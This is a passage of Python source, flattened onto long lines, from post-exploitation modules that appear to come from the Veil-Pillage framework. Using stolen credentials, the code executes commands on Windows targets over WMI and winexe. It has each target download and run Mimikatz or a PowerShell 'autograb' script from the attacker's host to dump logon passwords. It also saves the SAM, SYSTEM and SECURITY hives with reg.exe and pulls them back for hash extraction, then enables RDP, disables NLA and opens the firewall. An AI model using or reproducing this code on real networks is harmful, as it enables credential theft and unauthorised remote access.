appropriate arguments delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs) print "\n [*] Waiting "+delay+"s for Mimikatz to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) if out != "": self.output += "[*] Mimikatz results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n" else: self.output += "[!] Mimikatz failed using creds '"+username+":"+password+"' on "+target+" : no result file\n" # append the total mimikatz creds if we have any if len(allmsv) > 0: allmsv = sorted(set(allmsv)) self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n" if len(allkerberos) > 0: allkerberos = sorted(set(allkerberos)) self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n" if len(allwdigest) > 0: allwdigest = sorted(set(allwdigest)) self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n" if len(alltspkg) > 0: alltspkg = sorted(set(alltspkg)) self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] lhost = self.required_options["lhost"][0] use_ssl = self.required_options["use_ssl"][0] force_method = self.required_options["force_method"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # let's keep track of all credentials found allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], [] for target in self.targets: powershellInstalled = False # check if we're forcing a particular grab method if force_method.lower() == "binary": powershellInstalled = False elif force_method.lower() == "powershell": powershellInstalled = True else: # check if we have a functional Powershell installation powershellCommand = "powershell.exe -c \"$a=42;$a\"" powershellResult = command_methods.executeResult( target, username, password, powershellCommand, "wmis") if powershellResult.strip() == "42": powershellInstalled = True if powershellInstalled: # do powersploit combined file of invoke-mimikatz and powerdump print helpers.color("\n [*] Powershell installed on " + target) self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # path to the combined Invoke-Mimikatz/powerdump powershell script secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1" # trigger the powershell download on just this target delivery_methods.powershellHostTrigger(target, username, password, secondStagePath, lhost, "", triggerMethod="winexe", outFile=out_file, ssl=use_ssl, noArch=True) print "\n [*] Waiting " + delay + "s for Autograb to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # parse the powerdump component hashes = helpers.parseHashdump(out) allhashes.extend(hashes) if out != "": self.output += "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" else: # do reg.exe for hashdump and host/execute for mimikatz print helpers.color("\n [!] Powershell not installed on " + target, warning=True) print helpers.color( "\n [*] Using reg.exe save method for hash dumping on " + target) self.output += "[!] Powershell not installed on " + target + "\n" # reg.exe command to save off the hives regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y" # execute the registry save command command_methods.executeCommand(target, username, password, regSaveCommand, "wmis") print helpers.color("\n [*] Dumping hashes on " + target) # sleep for 5 seconds to let everything backup time.sleep(5) # grab all of the backed up files systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False) securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False) samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False) # more error-checking here? if systemFile == "": self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n" else: f = open('/tmp/system', 'w') f.write(systemFile) f.close() if securityFile == "": self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n" else: f = open('/tmp/security', 'w') f.write(securityFile) f.close() if samFile == "": self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n" else: f = open('/tmp/sam', 'w') f.write(samFile) f.close() # get all the hashes from these hives out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam") # save the output file off saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out) self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n" # save these off to the universal list hashes = helpers.parseHashdump(out) allhashes.extend(hashes) # now, detect the architecture archCommand = "echo %PROCESSOR_ARCHITECTURE%" archResult = command_methods.executeResult( target, username, password, archCommand, "wmis") arch = "x86" if "64" in archResult: arch = "x64" # now time for ze mimikatz! mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file # host mimikatz.exe and trigger it ONLY on this particular machine # so we can get the architecture correct delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs) print "\n [*] Waiting " + delay + "s for Mimikatz to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) if out != "": self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" if len(allhashes) > 0: allhashes = sorted(set(allhashes)) self.output += "[*] All unique hashes:\n\t" + "\n\t".join( allhashes) + "\n" if len(allmsv) > 0: allmsv = sorted(set(allmsv)) self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n" if len(allkerberos) > 0: allkerberos = sorted(set(allkerberos)) self.output += "[*] All kerberos:\n\t" + "\n\t".join( allkerberos) + "\n" if len(allwdigest) > 0: allwdigest = sorted(set(allwdigest)) self.output += "[*] All wdigest:\n\t" + "\n\t".join( allwdigest) + "\n" if len(alltspkg) > 0: alltspkg = sorted(set(alltspkg)) self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self): # assume single set of credentials (take the first one) username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # enable RDP command rdpCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f" # cleanup RDP command rdpCleanupCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f" # Disable NLA command nlaCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f" # Firewall exception command firewallCMD = "netsh firewall set service type = remotedesktop mod = enable" for target in self.targets: # execute the RDP enable command and get the result rdpResult = command_methods.executeResult(target, username, password, rdpCMD, triggerMethod) if rdpResult == "": self.output += "[!] No result file, RDP enable failed using creds '" + username + ":" + password + "' on : " + target + "\n" elif "The operation completed successfully" in rdpResult: self.output += "[*] RDP successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n" # our cleanup is to execute the RDP disable command self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + rdpCleanupCMD + "|" + triggerMethod + "\n" # if we succeed here, keep going... # execute the disable NLA command nlaResult = command_methods.executeResult( target, username, password, nlaCMD, triggerMethod) if nlaResult == "": self.output += "[!] No result file, NLA disable failed using creds '" + username + ":" + password + "' on : " + target + "\n" elif "The operation completed successfully" in nlaResult: self.output += "[*] NLA successfully disabled using creds '" + username + ":" + password + "' on : " + target + "\n" # more success, keep going again... # execute the firewall exception command firewallResult = command_methods.executeResult( target, username, password, firewallCMD, triggerMethod) if firewallResult == "": self.output += "[!] No result file, firewall exeception failed using creds '" + username + ":" + password + "' on : " + target + "\n" elif "executed successfully" in firewallResult: self.output += "[*] Firewall exception successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n" else: self.output += "[!] Error in enabling firewall exception using creds '" + username + ":" + password + "' on : " + target + "\n" else: self.output += "[!] Error in disabling NLA using creds '" + username + ":" + password + "' on : " + target + "\n" else: self.output += "[!] Error in enabling RDP using creds '" + username + ":" + password + "' on : " + target + "\n"